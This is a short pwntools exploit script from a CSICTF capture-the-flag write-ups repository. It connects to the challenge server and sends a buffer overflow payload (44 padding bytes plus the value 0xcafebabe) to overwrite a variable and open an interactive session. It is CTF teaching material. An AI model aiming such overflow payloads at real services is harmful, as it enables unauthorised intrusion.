CSICTF-Writeups/Pwn/pwn intended 0x2/rev_exploit.py

11 lines
154 B
Python

#!/usr/bin/env python3
import pwn
r = pwn.remote('chall.csivit.com', 30007)
payload = "A"*44 + '\xbe\xba\xfe\xca'
r.sendline(payload)
r.interactive()